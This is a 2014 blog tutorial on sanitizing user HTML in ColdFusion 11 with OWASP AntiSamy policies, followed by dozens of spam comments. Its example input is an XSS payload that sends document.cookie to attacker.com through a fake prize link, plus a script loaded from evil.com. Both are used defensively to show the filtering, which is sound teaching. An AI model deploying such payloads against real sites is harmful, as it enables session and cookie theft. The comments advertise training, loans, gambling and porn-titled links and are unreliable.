Wednesday, April 9, 2014

Using Antisamy Framework with ColdFusion 11

AntiSamy is an OWASP API for sanitizing the HTML/CSS input. ColdFusion 11 provides HTML/CSS sanitation functions which does its job based on the given AntiSamy policy files. If you are familiar with AntiSamy framework, skip to section Integration with ColdFusion.

Need for AntiSamy:

Cross-site scripting (XSS) is one of the most common and prevalent security vulnerability found in web applications. XSS can leverage the vulnerabilities in the web application code which allows attacker to inject and execute malicious code(javascript) into the end-user browser. Some of the serious threats by XSS includes session hijacking by stealing authentication information such as cookies, stealing sensitive data loaded in the web page and performing operations on behalf of the victim etc.

XSS vulnerabilities can be classified into three types – Firstly, DOM based which exists in the clients web page, Secondly; on-Persistent or Reflected is when malicious input supplied is displayed back onto the screen after returning back from the server. And finally the most dangerous XSS vulnerability - Persistent or Second Order or Stored XSS wherein the malicious data supplied is stored in the persistent storage or database. One of the primary attack vector for XSS is not having proper validation/escaping mechanisms in place. To defend such type attacks several encoding/escaping mechanisms need to be used depending on the place where the input needs to be placed in the HTML. ColdFusion provides several encoding/escaping functions which helps in validating the input and prevents from many forms of XSS.

In many websites where application developers wishes to provide an option of posting HTML markup so that users can post formatted and interactive data. In that instance encoding/escaping cannot performed on the posted HTML markup as the input needs to be rendered in the browser. Forums & blogs are places where content posted from one user will be displayed back to other website users. There by not encoding/escaping the unverified input definitely opens up new possibilities for XSS.  One can use markup parsers such as BBCode and WikiText which provides alternate set of markup tags similar to HTML. These markup parsers converts these set of tags to equivalent HTML. These parsers can effectively whitelist the allowed formatting tag but using this we can not leverage HTML and forces user to learn new language. 

One last option could be to devise an XSD schema file by defining list of allowed html tags and attributes. Convert all the given HTML input to XML and then verify the xml using the XSD schema file. It provides a flexible implementation, whitelisting of tags. But the problem with XSD schema validation is it provides no response or error message to the user and XSD needs to be created for all HTML elements.

AntiSamy Framework:

AntiSamy solves the problem of allowing HTML content and also protecting the application from possible attacks like XSS. AntiSamy is one such framework which can sanitize/validate the given input markup which can contain HTML, CSS according to a given policy file. AntiSamy is an OWASP Open source API that will allow user submitted HTML/CSS and limits the potential malicious content to get through. AntiSamy follows the whitelist approach to get the clean HTML/CSS output markup. Also, it provides user friendly error messages to let the user know what HTML, validation or security errors existed.

AntiSamy policy file is an XML file which defines set of rules like below:

  • Which HTML tags needs to be removed, filtered, validated or encoded.
  • Validation rules can be written for HTML tag attribute values using regular expressions and constant values
  • CSS parsing rules can be written to validate each CSS property individually using regular expressions and constant values.    

AntiSamy just validates/sanitizes the input according to the given policy file the protection always depends how strict the policy file is written. For more information on AntiSamy and visit OWASP AntiSamy Project page https://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project Check out the AntiSamy developer guide for understanding policy files and how to define them according to the requirement.

AntiSamy uses NekoHTML and the given policy file for validating the given HTML/CSS input markup. NekoHTML is a simple HTML scanner and tag balancer that enables application programmers to parse HTML documents and access the information using standard XML interfaces. The parser can scan HTML files and "fix up" many common mistakes that human (and computer) authors make in writing HTML documents. NekoHTML adds missing parent elements; automatically closes elements with optional end tags; and can handle mismatched inline element tags. After reading the input using NekoHTML antisamy builds a DOM tree out of it then validates all of its nodes with the given policy file.

AntiSamy provides the following boilerplate policy files that you can use (can be downloaded from OWASP project page) and further can be modified to meet your project requirements.
  • antisamy-slashdot.xml - This policy file only allows strict text formatting, and may be a good choice if users are submitting HTML in a comment thread.
  • antisamy-ebay.xml – This policy file gives the user a little bit of freedom, and may be a good choice if users are submitting HTML for a large portion of a page.
  • antisamy-myspace.xml – This policy file gives the user a lot of freedom, and may be a good choice if users are submitting HTML for an entire page. 
  • antisamy-tinymce.xml - This policy file only allows text formatting, and may be a good choice if users are submitting HTML to be used in a blog post. 
  • antisamy-anythinggoes.xml – A very dangerous policy file, this will allow all HTML, CSS and JavaScript. You shouldn’t use this in production.This policy file allows every single HTML and CSS. Not for production use.
When to use AntiSamy:

If you are accepting normal text data from the user use the encoding functions of ESAPI provided by coldfusion for validating and displaying them in the web browser. ColdFusion provides the following list of functions for this purpose:

encodeForHTML, encodeForHTMLAttribute, encodeForCSS, encodeForJavaScript and encodeForURL

If you accept HTML markup from the user use the antisamy functions provided by ColdFusion 11.  Before planning to use antisamy, think which tags, attributes and css rules you need. Define the required regular expressions, constant literals for the allowed values in an attribute. If your requirement matches with one of the example policy files given by antisamy modify them so that they can meet your requirement. Devise the policy rules according to your requirements and at the same time keeping XSS in mind. 
Integration with ColdFusion:

ColdFusion 11 added new methods that can sanitize/validate the input based on the given AntiSamy policy file. ColdFusion 11 ships a basic AntiSamy policy file which is fairly permissive. This policy file allows most HTML elements, and may be useful if users are submitting full HTML pages. Two functions isSafeHTML and getSafeHTML were added to work with antisamy policy

Function isSafeHTML can be used to validate whether the provided input string is according to the rules defined in the AntiSamy policy. getSafeHTML can be used to get the clean html or the policy violation errors (what wrong went with the input) as per the policy.
getSafeHTML(unsafeHTML [, policyFile], throwOnError])
isSafeHTML(unsafeHTML [, policyFile])
unsafeHTML
     The HTML input markup text to sanitize
policyFile (Optional)
     Specify the path to the AntiSamy policy file. Given path can be an absolute path or a relative to the Application.cfc/cfc.

throwOnError (Optional)
      If set to true and given input violates the allowed HTML rules specified in the policy file an exception will be thrown. The exception message contains the list of violations raised because of the input. If set to false ignores the exception returns the HTML content filtered, cleaned according to the policy rules. Defaults to false.
As you see the policy file for these functions is optional. An AntiSamy policy file can be specified at function, application and server levels. The default server level AntiSamy policy file antisamy-basic.xml can be found at <CF_HOME>\lib\antisamy-basic.xml. To specify the policy file at application level set the application setting this.security.antisamypolicy value to the location of policy file. If no AntiSamy file location is supplied to functions ColdFusion checks if any policy file configured at application level. If configured uses it otherwise uses the server level AntiSamy policy file.
Application.cfc
component
{
    this.security.antisamypolicy = "antisamy.xml"; // Path can be absolute or relative to the application cfc path.
}
Here is an example showing how to use these functions

Examples: 

In this example we will be using the policy file antisamy-slashdot.xml from OWASP. The policy file strictly allows only <b> <i> <p> <br> <a> <ol> <ul> <li> <dl> <dt> <dd> <em> <strong> <tt> <blockquote> <div> <ecode> <quote> tags and no other css tags are allowed. isSafeHTML validates the input according to policy returns true or false and getSafeHTML sanitizes the input by filtering out and returns the clean HTML markup. As these are examples i am using static text input but when using these functions replace them with relevant form variables.

<cfset inputHTML = "<script>function geturl(){return 'http://attacker.com?cookie='+document.cookie;}</script><b>You have won an IPAD.</b><a href='javascript:geturl()'>Click here to cliam the prize</a>">


<!--- Example1 Check whether input is according to policy rules --->

<cfset isSafe = isSafeHTML(inputHTML, "C:\antisamy-slashdot.xml")>

<cfoutput>is Safe HTML: #isSafe#</cfoutput>

<!--- Example2 Check whether input is according to policy rules --->
<cfset anotherInput = "<div><b>Hello World!!</b><br/>lorem ipsum lorem ipsum</div>">

<cfset isSafe = isSafeHTML(anotherInput , "C:\antisamy-slashdot.xml")>

<cfoutput>is Safe HTML: #isSafe#</cfoutput>
<!--- Example 3: Get Safe HTML By filtering out invalid input using the server level policy antisamy-basic.xml when application level setting is not specified---> 

<cfset safeHTML = getSafeHTML(inputHTML, "",false)> 
<cfoutput> 
  Thanks for submitting the content #safeHTML# <br/> 
</cfoutput> 

<!--- Example 4: Get Safe HTML when no violations were present---> 
<cftry> 
  <cfset safeHTML = getSafeHTML(inputHTML, "C:\antisamy-slashdot.xml", true)> 
     <cfoutput> 
   Thanks for submitting the content #safeHTML# <br/> 
 </cfoutput> 
 <cfcatch type="application"> 
     <cfoutput>Invalid Input markup. Please correct the below errors then submit the input again <br/><br/>#cfcatch.details#</cfoutput> 
 </cfcatch>
 </cftry>
<!--- Example 5: shows how antisamy fixes up invalid HTML (end </p> tag is missing) --->
<cfset inputHTML = "<p>This is <b onclick=“alert(bang!)”>so</b> cool!!<img src=“http://example.com/logo.jpg”><script src=“http://evil.com/attack.js”>">
<cfset safeHTML = getSafeHTML(inputHTML, "",false)> 
<cfoutput>#safeHTML#</cfoutput> 

AntiSamy-slashdot policy configured not to allow script tags, executing javascript from anchor tag href attribute there by the input is considered as unsafe. In example1 isSafeHTML returns No. In example 2 the given input contains only div and b tags which are allowed by the policy returns Yes.

<!-- copied parts from the antisamy-slashdot.xml -->

<regexp name="onsiteURL" value="([\p{L}\p{N}\\/\.\?=\#&amp;;\-_~]+|\#(\w)+)">
<regexp name="offsiteURL" value="(\s)*((ht|f)tp(s?)://|mailto:)[\p{L}\p{N}]+[~\p{L}\p{N}\p{Zs}\-_\.@\#\$%&amp;;:,\?=/\+!\(\)]*(\s)*">

<regexp-list>
<regexp name="onsiteURL">
<regexp name="offsiteURL">
</regexp></regexp></regexp-list>

<tag-rules>
<!--  Tags related to JavaScript  -->
<tag action="remove" name="script">

<!--  Anchor and anchor related tags  -->
<tag action="validate" name="a">
<attribute name="href" oninvalid="filterTag">
Example 3 shows how to get clean HTML by filtering out the violations as per the policy. Example 3 gives the output "Thanks for submitting the content You have won an IPAD. Click here to cliam the prize". Script tags were removed from the input and in the given input anchor tag contains an invalid value in href attribute there by it filtered out the anchor tag but keeping the content inside of it. As the <b> tags allowed it was kept as it is.

 Example 4 shows how to get the user friendly policy violation messages using getSafeHTML. Example 4 gives the output "The script tag is not allowed for security reasons. This tag should not affect the display of the input. The a tag contained an attribute that we could not process. The href attribute had a value of "javascript:geturl()". This value could not be accepted for security reasons. We have chosen to filter the a tag in order to continue processing the input.". Example 5 shows how getSafeHTML fixes up the invalid HTML.It gives the output as "<p>This is <b>so</b> cool!!</p>" by fixing the end paragraph (p) tag.

Furthur Reading:

https://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project

https://code.google.com/p/owaspantisamy/downloads/list
http://nekohtml.sourceforge.net/  

82 comments :

  1. hi welcome to this blog. really you have post an informative blog. it will be really helpful to many peoples. thank you for sharing this blog. it will be really helpful to many peoples. thank you for sharing this blog.
    java training in chennai

    ReplyDelete
  2. I found your article on time, when i searching JAVA… Thanks for this successful information’s
    java training in chennai

    ReplyDelete
  3. Thanks for the blog. You have given usefull information regardng training in chennai .

    ReplyDelete
  4. Nowadays, most of the businesses rely on cloud based CRM tool to power their business process. They want to access the business from anywhere and anytime. In such scenarios, salesforce CRM will ensure massive advantage to the business owners.Cloud Computing Training in Chennai

    ReplyDelete

  5. Wonderful blog.. Thanks for sharing informative Post. Its very useful to me.

    Installment loans
    Payday loans
    Title loans

    ReplyDelete

  6. It is amazing and wonderful to visit your site.Thanks for sharing this information,this is useful to me...
    Android Training in Chennai
    Ios Training in Chennai

    ReplyDelete
  7. Thank you for the article, thanks for sharing. And i'm really like this blog
    Judi BandarQ
    Agen BandarQ
    Judi Domino99

    ReplyDelete
  8. Good article. If you are looking for a good training institute in Chennai, <a href="http://www.html5training.in> here is the best </a>.

    ReplyDelete
  9. EduwizzOnlineTraining is the Best Online Training Institute in Hyderabad, Bangalore. Eduwizz provide courses like Hybris Development, WebSphere Commerce Server,Blockchain Training,Hyperledger Fabric Development ,Ethereum Development ,Commvault Training, Devops , Netapps , Mulesoft ESB ,Machine Learning,Internet of Things , Hybris ,Angular JS , Node JS , Express JS , Business Analyst, Selenium testing with webdriver, Guidewire ,Adobe, RPA ,TSM, EMC...etc

    ReplyDelete
  10. This information is impressive; I am inspired with your post writing style.Its a wonderful post and very helpful, thanks for all this information.
    SAP HR Training in Chennai
    SAP SD Training in Chennai

    ReplyDelete
  11. I simply wanted to write down a quick word to say thanks to you for those wonderful tips and hints you are showing on this site.

    Java Training Institute Bangalore

    Best Java Training Institute Chennai


    ReplyDelete
  12. I think this is among the most important info for
    me. And i am glad reading your article. But want to remark on few general things, The website style is great,
    the articles is really nice : D. Good job, cheers

    Young XXX HD
    18yo XXX Teen
    Teen XXX HD
    Young XXX Videos
    Young XXX Porn
    Perdungulatoz.com

    ReplyDelete
  13. I think this is among the most important info for
    me. And i am glad reading your article. But want to remark on few general things, The website style is great,
    the articles is really nice : D. Good job, cheers

    Young XXX HD
    18yo XXX Teen
    Teen XXX HD
    Young XXX Videos
    Young XXX Porn
    Perdungulatoz.com

    ReplyDelete
  14. Needed to compose you a very little word to thank you yet again regarding the nice suggestions you’ve contributed here.
    mean-stack-training-institute-in-chennai

    ReplyDelete
  15. I believe there are many more pleasurable opportunities ahead for individuals that looked at your site.
    Best Python training Institute in chennai

    ReplyDelete
  16. I believe there are many more pleasurable opportunities ahead for individuals that looked at your site.


    Amazon Web Services Training in Chennai


    Best Java Training Institute Chennai


    ReplyDelete
  17. This information is impressive; I am inspired with your post writing style.Its a wonderful post and very helpful, thanks for all this information.
    html5 corporate training in chennai

    ReplyDelete
  18. Hi, thanks for posting a tips-full article, I had learned more things on this blog, Keep on blogging, thanks .
    JAVA Training in chennai

    ReplyDelete
  19. Ciitnoida provides Core and java training institute in noida. We have a team of experienced Java professionals who help our students learn Java with the help of Live Base Projects. The object-oriented, java training in noida , class-based build of Java has made it one of most popular programming languages and the demand of professionals with certification in Advance Java training is at an all-time high not just in India but foreign countries too.

    By helping our students understand the fundamentals and Advance concepts of Java, we prepare them for a successful programming career. With over 13 years of sound experience, we have successfully trained hundreds of students in Noida and have been able to turn ourselves into an institute for best Java training in Noida.

    java training institute in noida
    java training in noida
    best java training institute in noida
    java coaching in noida
    java institute in noida

    ReplyDelete
  20. Hi, thanks for posting a tips-full article, I had learned more things on this blog, Keep on blogging, thanks .
    JAVA Training in chennai

    ReplyDelete
  21. ERP-SAP-SD Training Centre in Noida

    CIIT Noida provides Best SAP Training in Noida based on current industry standards that helps attendees to secure placements in their dream jobs at MNCs. CIIT Provides Best ERP SAP Training in Noida. CIIT is one of the most credible ERP SAP training institutes in Noida offering hands on practical knowledge and full job assistance with basic as well as advanced level ERP SAP training courses. At CIIT ERP SAP training in noida is conducted by subject specialist corporate professionals with 7+ years of experience in managing real-time ERP SAP projects. CIIT implements a blend of aERPemic learning and practical sessions to give the student optimum exposure that aids in the transformation of naïve students into thorough professionals that are easily recruited within the industry.

    At CIIT’s well-equipped ERP SAP training center in Noida aspirants learn the skills for ERP SAP Basis, ERP SAP ABAP, ERP SAP APO, ERP SAP Business Intelligence (BI), ERP SAP FICO, ERP SAP HANA, ERP SAP Production Planning, ERP SAP Supply Chain Management, ERP SAP Supplier Relationship Management, ERP SAP Training on real time projects along with ERP SAP placement training. ERP SAP Training in Noida has been designed as per latest industry trends and keeping in mind the advanced ERP SAP course content and syllabus based on the professional requirement of the student; helping them to get placement in Multinational companies and achieve their career goals.

    ReplyDelete
  22. BCA Colleges in Noida

    CIIT Noida provides Sofracle Specialized B Tech colleges in Noida based on current industry standards that helps students to secure placements in their dream jobs at MNCs. CIIT provides Best B.Tech Training in Noida. It is one of the most trusted B.Tech course training institutes in Noida offering hands on practical knowledge and complete job assistance with basic as well as advanced B.Tech classes. CIITN is the best B.Tech college in Noida, greater noida, ghaziabad, delhi, gurgaon regoin .

    At CIIT’s well-equipped Sofracle Specialized M Tech colleges in Noida aspirants learn the skills for designing, analysis, manufacturing, research, sales, management, consulting and many more. At CIIT B.Tech student will do practical on real time projects along with the job placement and training. CIIT Sofracle Specialized M.Tech Classes in Noida has been designed as per latest IT industry trends and keeping in mind the advanced B.Tech course content and syllabus based on the professional requirement of the student; helping them to get placement in Multinational companies (MNCs) and achieve their career goals.

    MCA colleges in Noida we have high tech infrastructure and lab facilities and the options of choosing multiple job oriented courses after 12th at Noida Location. CIIT in Noida prepares thousands of engineers at reasonable B.Tech course fees keeping in mind training and B.Tech course duration and subjects requirement of each attendee.

    Engineering College in Noida"

    ReplyDelete
  23. FITA offers a wide range of JAVA training in Chennai to meet the growing corporate needs.We provide Java Training in Chennai with Placement in leading companies. Walk into our Office to find the list of Companies our Students are placed.FITA TNAGAR is the best training institute in Chennai.

    ReplyDelete
  24. the blog is good and Interactive it is about Mulesoft Developer it is useful for students and Mulesoft Developers for more updates on Mulesoft mulesoft Online course hyderabad

    ReplyDelete
  25. Thank you for your information.FITA offers best certification course training on angularjs. kindly visit our page advanced angularjs training

    ReplyDelete
  26. Thankyou for posting valuable information
    find the best training institute for AWS
    AWS training in chennai

    ReplyDelete
  27. I like and very happy to read this article and I also like your blog very good
    togel online

    ReplyDelete
  28. Great post! Thanks for sharing this valuable information.
    Java Training in Chennai

    ReplyDelete
  29. Thank you for sharing beneficial information nice post learn mulesoft online

    ReplyDelete
  30. Thanks for your article with us. Very nice post, thanks for your useful information. We proceed to Chennai City Sightseeing Tour Packages. Welcome to SriBhavani Tours & Travels is one of the leading travel agents in Chennai. We have a bent to tend to face live supply Tirupati tour package from Chennai, letting services that unit of measurement pioneer in providing affordable costs for Tirumala Tirupati tour package from chennai car services. Tours like one-day and two-day journeys unit of measurement designed to fulfill your specific demand.

    ReplyDelete
  31. TikiQQ Adalah Agen BandarQ, Agen DominoQQ Terbaik Dan Terpercaya Saat Ini Dengan Pelayanan Transaksi Yang Super Cepat Selama 24 Jam NonStop Dan Persentase Kemenangan Yang Tinggi
    Agen BandarQ
    BandarQ
    Domino99
    Dominoqq
    Domino Qiu Qiu
    Agen Domino99
    Agen Dominoqq
    Agen Domino Qiu Qiu
    Qiu Qiu Online

    ReplyDelete
  32. Bolamas88 adalah Situs Taruhan Bola Online, Casino Online, Tangkas Online, Togel Online Dan Merupakan Situs Judi Online Terbaik, Terlengkap Dan Terpercaya Di Indonesia
    Agen Bola
    Judi Bola
    Betting Bola
    Taruhan Bola
    Bandar Bola
    Taruhan Online
    Judi Online
    Tangkas Online
    Togel Online
    Casino Online
    Betting Online

    ReplyDelete
  33. Virgo4D adalah Situs Agen Judi Terpercaya Dengan Games Paling Lengkap Hanya Dengan 1 User ID | Togel Singapura | Sabung ayam | Sbobet | Judi Bola | Judi Online | Agen Sbobet | Agen bola | Agen Judi
    Agen togel
    Togel Online
    Bandar Togel
    Bandar Bola
    Live Casino
    Casino Online
    Tembak Ikan
    Slot Games
    Tangkas Online
    Poker Domino 99

    ReplyDelete
  34. TikiQQ Adalah Agen BandarQ, Agen DominoQQ Terbaik Dan Terpercaya Saat Ini Dengan Pelayanan Transaksi Yang Super Cepat Selama 24 Jam NonStop Dan Persentase Kemenangan Yang Tinggi
    Agen BandarQ
    BandarQ
    Domino99
    Dominoqq
    Domino Qiu Qiu
    Agen Domino99
    Agen Dominoqq
    Agen Domino Qiu Qiu
    Qiu Qiu Online

    ReplyDelete
  35. Bolamas88 adalah Situs Taruhan Bola Online, Casino Online, Tangkas Online, Togel Online Dan Merupakan Situs Judi Online Terbaik, Terlengkap Dan Terpercaya Di Indonesia
    Agen Bola
    Judi Bola
    Betting Bola
    Taruhan Bola
    Bandar Bola
    Taruhan Online
    Judi Online
    Tangkas Online
    Togel Online
    Casino Online
    Betting Online

    ReplyDelete
  36. Virgo4D adalah Situs Agen Judi Terpercaya Dengan Games Paling Lengkap Hanya Dengan 1 User ID | Togel Singapura | Sabung ayam | Sbobet | Judi Bola | Judi Online | Agen Sbobet | Agen bola | Agen Judi
    Agen togel
    Togel Online
    Bandar Togel
    Bandar Bola
    Live Casino
    Casino Online
    Tembak Ikan
    Slot Games
    Tangkas Online
    Poker Domino 99

    ReplyDelete
  37. TikiQQ Adalah Agen BandarQ, Agen DominoQQ Terbaik Dan Terpercaya Saat Ini Dengan Pelayanan Transaksi Yang Super Cepat Selama 24 Jam NonStop Dan Persentase Kemenangan Yang Tinggi
    Agen BandarQ
    BandarQ
    Domino99
    Dominoqq
    Domino Qiu Qiu
    Agen Domino99
    Agen Dominoqq
    Agen Domino Qiu Qiu
    Qiu Qiu Online

    ReplyDelete
  38. Bolamas88 adalah Situs Taruhan Bola Online, Casino Online, Tangkas Online, Togel Online Dan Merupakan Situs Judi Online Terbaik, Terlengkap Dan Terpercaya Di Indonesia
    Agen Bola
    Judi Bola
    Betting Bola
    Taruhan Bola
    Bandar Bola
    Taruhan Online
    Judi Online
    Tangkas Online
    Togel Online
    Casino Online
    Betting Online

    ReplyDelete
  39. Virgo4D adalah Situs Agen Judi Terpercaya Dengan Games Paling Lengkap Hanya Dengan 1 User ID | Togel Singapura | Sabung ayam | Sbobet | Judi Bola | Judi Online | Agen Sbobet | Agen bola | Agen Judi
    Agen togel
    Togel Online
    Bandar Togel
    Bandar Bola
    Live Casino
    Casino Online
    Tembak Ikan
    Slot Games
    Tangkas Online
    Poker Domino 99

    ReplyDelete
  40. Great blog! Thanks for giving such valuable information, this is unique one. Really admired.

    Java Training in Chennai

    ReplyDelete
  41. Needed to compose you a very little word to thank you yet again regarding the nice suggestions you’ve contributed here.

    aws training in chennai

    advanced aws training in chennai

    ReplyDelete
  42. TikiQQ Adalah Agen BandarQ, Agen DominoQQ Terbaik Dan Terpercaya Saat Ini Dengan Pelayanan Transaksi Yang Super Cepat Selama 24 Jam NonStop Dan Persentase Kemenangan Yang Tinggi
    Agen BandarQ
    BandarQ
    Domino99
    Dominoqq
    Domino Qiu Qiu
    Agen Domino99
    Agen Dominoqq
    Agen Domino Qiu Qiu
    Qiu Qiu Online

    ReplyDelete
  43. Bolamas88 adalah Situs Taruhan Bola Online, Casino Online, Tangkas Online, Togel Online Dan Merupakan Situs Judi Online Terbaik, Terlengkap Dan Terpercaya Di Indonesia
    Agen Bola
    Judi Bola
    Betting Bola
    Taruhan Bola
    Bandar Bola
    Taruhan Online
    Judi Online
    Tangkas Online
    Togel Online
    Casino Online
    Betting Online

    ReplyDelete
  44. Virgo4D adalah Situs Agen Judi Terpercaya Dengan Games Paling Lengkap Hanya Dengan 1 User ID | Togel Singapura | Sabung ayam | Sbobet | Judi Bola | Judi Online | Agen Sbobet | Agen bola | Agen Judi
    Agen togel
    Togel Online
    Bandar Togel
    Bandar Bola
    Live Casino
    Casino Online
    Tembak Ikan
    Slot Games
    Tangkas Online
    Poker Domino 99

    ReplyDelete
  45. Bandar Ceme Terpercaya, Agen Poker Paling Bagus di Indonesia | PERMATAPOKER



    Permatapoker.net merupakan salah satu Agen Poker Online paling baru, tapi untuk kualitas nya jangan tidak perlu di ragukan lagi. Mengapa? karena PermataPoker ini adalah salah satu cabang dari server Poker IDN Play yang dimana itu adalah salah satu dari Server Poker Terpercaya, Terbaik dan Paling Bagus dan sudah terbukti akan kualitasnya.



    Hanya dengan Monimal Deposit : 10rb

    Withdraw Minimal: 20rb



    TIADA HARI TANPA BONUS:

    BONUS DEPOSIT : 20% Sampai 30%

    BONUS REFFERAL : 20%

    BONUS CASHBACK: 0.5%

    SYARAT DAN KETENTUAN BERLAKU MUTLAK !!!



    LINK RESMI : www.permatapoker.com | www.permatapoker.net



    NGOBROL LANGSUNG DISINI :

    >> http://ow.ly/hL4j30la5eU



    KONTAK

    >>  BBM : E3775F25

    >> W.A : +85589798362

    >> LINE : Permatapoker



    LINK DAFTAR:

    >> http://ow.ly/TD0C30lapbI  , KLIK DISINI  !!

    >> http://ow.ly/Ay3O30lapd6  ,  KLIK DISINI  !!


    ReplyDelete
  46. Thanks for the informative article.This is one of the best resources I have found in quite some time.Nicely written and great info.I really cannot thank you enough for sharing.

    Herbalife in Chennai
    Subamwellness in Chennai
    Weight Loss in Chennai
    Weight Gain in Chennai

    ReplyDelete
  47. This comment has been removed by the author.

    ReplyDelete
  48. Thanks for sharing
    http://www.metaforumtechnologies.com/android-training-in-chennai

    ReplyDelete
  49. Very nice blog post more useful information your site thanks, for shearing Jyothi Travels, we are daily provided Chennai To Mahabalipuram Tour Package Our gathering of Mahabalipuram occasion bundles can offer you an opportunity to research the Shore Temples that area unit carved as UN agency World Heritage web site. Found 60 kilometers faraway from Chennai Mahabalipuram, with authority called Mamallapuram is widespread for its verifiable landmarks, sanctuaries and good shorelines Chennai to Mahabalipuram Tour Package

    ReplyDelete